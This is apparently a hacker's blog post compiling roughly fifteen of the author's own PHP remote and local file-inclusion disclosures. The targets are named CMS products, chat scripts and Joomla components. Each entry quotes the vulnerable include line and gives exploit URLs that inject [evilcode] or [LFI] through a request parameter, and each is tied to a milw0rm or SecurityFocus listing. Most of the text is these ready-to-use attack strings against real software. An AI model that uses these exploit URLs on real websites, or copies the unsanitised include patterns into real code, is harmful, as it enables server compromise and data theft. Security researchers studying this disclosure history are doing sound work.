[o] Fast Click SQL Lite 1.1.7 Remote File Inclusion Vulnerability
Software : Fast Click SQL Lite version 1.1.7
Vendor : http://www.ftrsoft.com/
Download : http://www.ftrsoft.com/downloads.html
Author : NoGe
[o] Vulnerable file
common/init.php
require($CFG['CDIR'].'/global.php');
require($CFG['CDIR'].'/sql.php');
[o] Exploit
http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode]
[o] Publish
http://milw0rm.com/exploits/6785
[o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability
Software : asiCMS version alpha 0.208
Vendor : http://asicms.sourceforge.net/
Download : http://sourceforge.net/project/showfiles.php?group_id=203457
Author : NoGe
[o] Vulnerable file
classes/Auth/OpenID/Association.php
classes/Auth/OpenID/BigMath.php
classes/Auth/OpenID/DiffieHellman.php
classes/Auth/OpenID/DumbStore.php
classes/Auth/OpenID/Extension.php
classes/Auth/OpenID/FileStore.php
classes/Auth/OpenID/HMAC.php
classes/Auth/OpenID/MemcachedStore.php
classes/Auth/OpenID/Message.php
classes/Auth/OpenID/Nonce.php
classes/Auth/OpenID/SQLStore.php
classes/Auth/OpenID/SReg.php
classes/Auth/OpenID/TrustRoot.php
classes/Auth/OpenID/URINorm.php
classes/Auth/Yadis/XRDS.php
classes/Auth/Yadis/XRI.php
classes/Auth/Yadis/XRIRes.php
All of these files are affected by the _ENV[asicms][path] variable
[o] Exploit
http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=[evilcode]
[o] Publish
http://milw0rm.com/exploits/6685
[o] X7 Chat 2.0.1A1 Local File Inclusion Vulnerability
Software : X7 Chat version 2.0.5.1
Vendor : http://x7chat.com/
Author : NoGe
[o] Vulnerable file
help/mini.php
include("./help/{$_GET['help_file']}");
[o] Exploit
http://localhost/[path]/help/mini.php?help_file=[LFI]
[o] Publish
http://milw0rm.com/exploits/6592
[o] LetterIt 2 Local File Inclusion Vulnerability
Software : LetterIt Newsletter Manager version 2
Vendor : http://www.letterit.de/
Author : NoGe
[o] Vulnerable file
inc/wysiwyg.php
include("../language/".$_GET['language'].".php");
[o] Exploit
http://localhost/[path]/inc/wysiwyg.php?language=[LFI]
[o] Publish
http://milw0rm.com/exploits/6179
[o] TalkBack 2.3.5 Local File Inclusion Vulnerability
Software : TalkBack version 2.3.5
Vendor : http://www.scripts.oldguy.us/talkback
Author : NoGe
[o] Vulnerable file
install/help.php
include "../language/{$_REQUEST['language']}.php";
[o] Exploit
http://localhost/[path]/install/help.php?language=[LFI]
[o] Publish
http://milw0rm.com/exploits/6148
[o] Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability
Software : com_joomla-visites version 1.1 RC2
Vendor : http://www.joomla-visites.net/
Author : NoGe
[o] Vulnerable file
administrator/components/com_joomla-visites/core/include/myMailer.class.php
require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php';
[o] Exploit
http://localhost/[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]
[o] Publish
http://milw0rm.com/exploits/5497
[o] Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability
Software : com_onlineflashquiz version 1.0.2 - paid component
Vendor : www.elearningforce.biz
Author : NoGe
[o] Vulnerable file
component/com_onlineflashquiz/quiz/common/db_config.inc.php
include_once($base_dir."common/classes/DBBase.class.php");
[o] Exploit
http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[evilcode]
[o] Publish
http://milw0rm.com/exploits/5345
[o] phpBBXS 058-006 Remote File Inclusion Vulnerability
Software : phpBBXS version 058-006
Vendor : http://www.phpbbxs.nl/
Author : NoGe
[o] Vulnerable file
bb_usage_stats/include/bb_usage_stats.php
include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx);
[o] Exploit
http://localhost/[path]/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=[evilcode]
[o] Publish
http://www.securityfocus.com/bid/20046
[o] TalkBack 2.2.7 Remote File Include Vulnerability
Software : TalkBack version 2.2.7
Vendor : http://www.scripts.oldguy.us/talkback
Author : NoGe
[o] Vulnerable file
comments-display-tpl.php
include $language_file;
include $config['comments_form_tpl'];
addons/separate-comments-mod/my-comments-display-tpl.php
include $language_file;
[o] Exploit
http://localhost/path/comments-display-tpl.php?language_file=[evilcode]
http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]
http://localhost/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]
[o] Publish
http://milw0rm.com/exploits/4640
[o] JUser Joomla Component 1.0.14 Remote File Include Vulnerability
Software : com_juser version 1.0.14 - paid component
Vendor : www.joomlaequipment.com
Author : NoGe
[o] Vulnerable file
administrator/components/com_juser/xajax_functions.php
require ($mosConfig_absolute_path.'/administrator/components/com_juser/xajax/xajax_core/xajax.inc.php');
[o] Exploit
http://localhost/path/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=[evilcode]
[o] Publish
http://milw0rm.com/exploits/4636
[o] com_mp3_allopass joomla component Remote File Include Vulnerability
Software : com_mp3_allopass
Download : http://www.joomlaratings.com
Author : NoGe
[o] Vulnerable file
components/com_mp3_allopass/allopass.php
require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");
components/com_mp3_allopass/allopass-error.php
require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");
[o] Publish
http://milw0rm.com/exploits/4507
[o] JContentSubscription Joomla Component 1.5.8 Multiple Remote File Include Vulnerability
Software : com_jcs version 1.5.8 - payable component
Vendor : www.joomlaequipment.com
Author : NoGe
[o] Vulnerable file
administrator/components/com_jcs/jcs.function.php
require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/view/add.php
require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/view/history.php
require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/view/register.php
require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );
administrator/components/com_jcs/views/list.sub.html.php
require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
administrator/components/com_jcs/views/list.user.sub.html.php
require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
administrator/components/com_jcs/views/reports.html.php
require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );
[o] Exploit
http://localhost/path/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=[evilcode]
http://localhost/path/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=[evilcode]
[o] Publish
http://milw0rm.com/exploits/4508
[o] wmtportfolio joomla component 1.0 Remote File Include Vulnerability
Software : com_wmtportfolio version 1.0
Download : http://www.webmaster-tips.net/
Author : NoGe
[o] Vulnerable file
administrator/components/com_wmtportfolio/admin.wmtportfolio.php
include( $mosConfig_absolute_path . "/components/com_wmtportfolio/additems.php" );
[o] Exploit
http://localhost/path/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=[evilcode]
[o] Publish
http://milw0rm.com/exploits/4497
[o] panoramic joomla component 1.0 Remote File Include Vulnerability
Software : com_panoramic version 1.0
Download : http://www.webmaster-tips.net/
Author : NoGe
[o] Vulnerable file
administrator/components/com_panoramic/admin.panoramic.php
line 3 include( "$mosConfig_live_site/components/com_panoramic/about.html" );
[o] Exploit
http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]
[o] Publish
http://milw0rm.com/exploits/4489
Waaaaa... finally made a new blog again.
Already forgot the old blog's login email and passwd. lolz
Oh well, enjoy this f*ckin blog!!